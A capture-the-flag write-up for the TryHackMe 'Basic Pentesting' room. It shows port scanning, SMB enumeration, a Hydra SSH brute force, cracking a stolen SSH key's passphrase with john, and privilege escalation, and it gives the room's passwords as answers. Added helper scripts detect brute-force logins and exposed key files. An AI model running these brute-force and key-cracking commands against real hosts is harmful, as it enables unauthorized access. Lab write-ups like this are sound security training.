# Basic pentesting

A very basic CTF room from [tryHackMe](https://tryhackme.com/room/basicpentestingjt). I enjoyed the privilege escalation part the most. Brute forcing is the key step in the exploitation here. I hope this write-up helps you explore the room.

My target IP changes part-way through the write-up because I had to restart the machine.


### Enumeration

1\) First, a masscan scan of all TCP ports: **`masscan -e eth0 -p 1-65535 -v --rate=10000 10.10.1.239`**

```
Discovered open port 22/tcp on 10.10.1.239                                     
Discovered open port 139/tcp on 10.10.1.239                                    
Discovered open port 8009/tcp on 10.10.1.239                                   
Discovered open port 8080/tcp on 10.10.1.239                                   
Discovered open port 80/tcp on 10.10.1.239                                     
Discovered open port 445/tcp on 10.10.1.239 
```

2\) Next, a targeted nmap scan of the discovered ports with version detection and default scripts: **`nmap -sV -sC -p 22,139,8009,8080,80,445 -v 10.10.1.239`**

```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7

Host script results:
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-06-04T09:50:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04 14:50:56
|_  start_date: 1600-12-31 23:58:45
```
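Bridging steps 1 and 2, here is an added helper (not part of the original write-up) that turns masscan's `Discovered open port` lines into the comma-separated port list that `nmap -p` expects, and builds the follow-up nmap command from it. The sample input is constructed from the masscan output above, with one duplicate line added to show the de-duplication; the nmap command is echoed rather than executed so the script runs offline.

```shell
# Added example, not from the original write-up.
# masscan_ports: stdin = masscan stdout, stdout = "22,80,139,445,8009,8080"
masscan_ports() {
    # $4 is "22/tcp"; keep the number, sort numerically, drop duplicates
    # (masscan can report a port twice when a SYN-ACK is retransmitted)
    awk '/Discovered open port/ { split($4, p, "/"); print p[1] }' \
        | LC_ALL=C sort -n -u \
        | paste -s -d, -
}

# nmap_command: reads masscan output on stdin, prints the nmap invocation
# for the given target (echoed, not run, so this works offline).
nmap_command() {
    target=$1
    ports=$(masscan_ports)
    echo "nmap -sV -sC -p $ports -v $target"
}

# Constructed sample input copied from the masscan output above, plus one
# duplicate line to exercise the de-duplication.
SAMPLE_MASSCAN='Discovered open port 22/tcp on 10.10.1.239
Discovered open port 139/tcp on 10.10.1.239
Discovered open port 8009/tcp on 10.10.1.239
Discovered open port 8080/tcp on 10.10.1.239
Discovered open port 80/tcp on 10.10.1.239
Discovered open port 445/tcp on 10.10.1.239
Discovered open port 445/tcp on 10.10.1.239'

printf '%s\n' "$SAMPLE_MASSCAN" | nmap_command 10.10.1.239
```

Against a live target the same glue is `masscan ... 10.10.1.239 | tee masscan.txt` followed by `nmap -sV -sC -p "$(masscan_ports < masscan.txt)" 10.10.1.239`; saving the raw masscan output keeps the evidence for the report.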

3\) enum4linux is a very useful tool for digging further into SMB, and it turned up some more information, including two local usernames: **`enum4linux -a -v 10.10.1.239`**

```
Sharename       Type      Comment
---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
	
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
```

The Samba version banner falls within the range covered by this exploit: [exploit-db](https://www.exploit-db.com/exploits/42084). Note that a version banner alone does not prove exploitability: distribution packages often backport security fixes without changing the version string, so this would need to be verified before relying on it.

4\) Enumerating the web page on port 80

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMOTqEawBLu_G8jUhZ%2F-MbMRh9707YbMuq0Qqq2%2Fimage.png?alt=media\&token=7e3b6ade-035a-42eb-998c-fb21ad115300)

5\) Since there is a web service, I ran a Nikto scan: **`nikto -h http://10.10.254.163`**

```
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
```

6\) The interesting directory, **/development**, holds two **.txt** files.

* dev.txt mentions a REST service being set up, and a search turns up a known exploit for that kind of setup: [exploit-db](https://www.exploit-db.com/exploits/42627). As with Samba, check the advisory's affected versions against what is actually running before relying on it.
* j.txt mentions a weak password, so brute forcing a login is a realistic option.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMS3FITSACqmxASHL6%2F-MbMT-O3HFstVa5tsv56%2Fimage.png?alt=media\&token=16f4f597-cc8c-470e-b46e-5dc4d2cd07b1)

### Exploitation

7\) I was unsure which service to attack, since two different services looked vulnerable. I decided to try SSH first, using Hydra with the rockyou wordlist against the user **jan** found through enum4linux (j.txt hinted that this user has a weak password): **`hydra -l jan -P rockyou.txt ssh://10.10.254.163`**

Found the password: **armando**

8\) Logging in to the machine over SSH: **`ssh jan@10.10.254.163`**
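For the defender's view of steps 7 and 8, here is an added example (not part of the original write-up) that tallies sshd `Failed`/`Accepted` lines in `auth.log` per source IP and flags the tell-tale Hydra pattern: a burst of failures from one address followed by a success. The log excerpt is constructed in OpenSSH's log format, not captured from the box, and the failure threshold of 5 is an assumption to tune for your environment.

```shell
# Added example, not from the original write-up.
# ssh_auth_summary: stdin = auth.log lines; stdout = "<ip> <failed> <accepted>"
ssh_auth_summary() {
    awk '
        / sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for / {
            # the source address is the field after "from"
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            if (ip == "") next
            if ($6 == "Failed") fail[ip]++; else ok[ip]++
            seen[ip] = 1
        }
        END { for (ip in seen) printf "%s %d %d\n", ip, fail[ip] + 0, ok[ip] + 0 }
    ' | LC_ALL=C sort
}

# ssh_bruteforce_alerts [threshold]: one alert line per source IP that has at
# least <threshold> failures; sources that also got an Accepted line are the
# ones to treat as a probable credential compromise.
ssh_bruteforce_alerts() {
    threshold=${1:-5}   # assumed default; tune to your environment
    ssh_auth_summary | awk -v t="$threshold" '
        $2 + 0 >= t + 0 {
            msg = $1 ": " $2 " failed logins"
            if ($3 > 0) msg = msg " then a SUCCESSFUL login (likely compromised credential)"
            print msg
        }
    '
}

# Constructed auth.log excerpt: five rapid failures (one against a
# non-existent user) from 10.9.3.7 followed by a success, and a single typo
# plus a normal key login from 10.9.8.2 for contrast.
SAMPLE_AUTH_LOG='Jun  4 09:51:40 basic2 sshd[2101]: Failed password for jan from 10.9.3.7 port 41010 ssh2
Jun  4 09:51:40 basic2 sshd[2103]: Failed password for jan from 10.9.3.7 port 41012 ssh2
Jun  4 09:51:41 basic2 sshd[2105]: Failed password for invalid user admin from 10.9.3.7 port 41014 ssh2
Jun  4 09:51:41 basic2 sshd[2107]: Failed password for jan from 10.9.3.7 port 41016 ssh2
Jun  4 09:51:42 basic2 sshd[2109]: Failed password for jan from 10.9.3.7 port 41018 ssh2
Jun  4 09:51:42 basic2 sshd[2111]: Accepted password for jan from 10.9.3.7 port 41020 ssh2
Jun  4 09:55:03 basic2 sshd[2150]: Failed password for kay from 10.9.8.2 port 50222 ssh2
Jun  4 09:55:10 basic2 sshd[2152]: Accepted publickey for kay from 10.9.8.2 port 50224 ssh2'

printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_alerts 5
```

On a real host this is `ssh_bruteforce_alerts 5 < /var/log/auth.log` (or the `journalctl -u ssh` output on journald systems). The fix for the weakness Hydra exploited here is `PasswordAuthentication no` in `sshd_config` plus key-only logins, with something like fail2ban as a backstop.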

### Privilege Escalation

9\) Basic enumeration shows that **/etc/passwd** is world-readable, as it normally is, but the shadow file is not, so there are no password hashes to take from there.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMfbjri43HOxZddbM4%2F1.png?alt=media\&token=0e96c817-7994-44d5-9632-331d934f8a39)

10\) Simply browsing the filesystem shows that kay's **.ssh** directory and private key are readable by other users.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMhkO48dOU5kImkaI2%2F2.png?alt=media\&token=2b636c44-5737-4b31-b666-8cdc4ef0f0ae)
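The "simple directory navigation" in step 10 can be made repeatable. Below is an added example (not part of the original write-up) that lists every regular file under a directory whose others-read bit is set, then narrows that list to the files worth opening first. The directory layout it runs against is a constructed fixture with fake contents, and the file-name patterns in `find_exposed_secrets` are an assumption about what tends to be left lying around, not an exhaustive list.

```shell
# Added example, not from the original write-up.
# find_world_readable DIR: every regular file under DIR that any local
# account can read, as sorted paths relative to DIR.
find_world_readable() {
    # -perm -004: "others" read bit set (octal form works on GNU and BSD find)
    ( cd "$1" && find . -type f -perm -004 | sed 's|^\./||' | LC_ALL=C sort )
}

# find_exposed_secrets DIR: the subset worth opening first - SSH private
# keys, backup files, anything with "pass" in the name (assumed patterns).
find_exposed_secrets() {
    find_world_readable "$1" \
        | grep -E '(^|/)(\.ssh/id_[a-z0-9]+|.*\.(bak|old|key|pem)|.*pass.*)$'
}

# make_fixture: constructed home-directory layout mirroring what step 10
# found (fake contents, not real keys or passwords), so this runs offline.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/kay/.ssh" "$root/jan"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'not a real key' \
        '-----END RSA PRIVATE KEY-----' > "$root/kay/.ssh/id_rsa"
    printf '%s\n' 'not-the-real-password' > "$root/kay/pass.bak"
    printf '%s\n' 'ssh-ed25519 PLACEHOLDER kay@basic2' > "$root/kay/.ssh/authorized_keys"
    printf '%s\n' 'private notes' > "$root/jan/todo.txt"
    chmod 644 "$root/kay/.ssh/id_rsa" "$root/kay/pass.bak"           # the mistake
    chmod 600 "$root/kay/.ssh/authorized_keys" "$root/jan/todo.txt"  # as it should be
    echo "$root"
}

fx=$(make_fixture)
find_exposed_secrets "$fx"   # prints kay/.ssh/id_rsa and kay/pass.bak
rm -rf "$fx"
```

On the box itself, `find_world_readable /home 2>/dev/null` as jan gives the same answer as browsing by hand. The fix is a `chmod 600` on the private key and the removal of the backup file; ssh itself refuses to load a key file with loose permissions, which is why the copy on the attacker's side needs `chmod 600` too.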

11\) I copied the contents of id\_rsa into a local file with nano and tried to log in with it, but the key alone is not enough: it is protected by a passphrase. (The copied file also needs `chmod 600`, or ssh refuses to use it.)

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMhxz9ilCthKtfm7nL%2F3.png?alt=media\&token=ebabe0e2-770e-4239-a611-3678efef7dc8)

12\) So I need to extract a crackable hash from the key, using ssh2john: **`ssh2john.py id_rsa > rsa_hash`**

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMi2rC0Wf5OiAJaL8d%2F-MbMkd80nji-SgBKBKlh%2Fimage.png?alt=media\&token=65bdd985-d00f-4c3e-922e-0d3e2e1ec19e)

13\) Then crack the passphrase with john, again using rockyou: **`john --wordlist=rockyou.txt rsa_hash`**

Passphrase: **beeswax**

14\) SSH in again as kay with the key, entering the passphrase when prompted: **`ssh -i id_rsa kay@10.10.254.163`**

15\) In kay's home directory there is a backup file containing kay's password. With that password, getting root is straightforward (`sudo -l` is the usual first check once you hold a user's password).

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMlPYOpF-rI0LfTSo4%2F-MbMmEACxqenX9oSqU6Y%2Fimage.png?alt=media\&token=13a671e9-ac98-4ae2-95e0-7adaee116275)

Finally, the root shell!

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMlPYOpF-rI0LfTSo4%2F-MbMmwPKMM-GMj4EIvaF%2F4.png?alt=media\&token=228748ab-bf68-40de-8eb5-880071114e8b)

### Answers

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMn-1VtAKAiFlS8Cki%2F-MbMpeS-MwBkybXjtrU2%2F5.png?alt=media\&token=f3d2ee0e-3589-4471-a4e4-65d67cad547d)
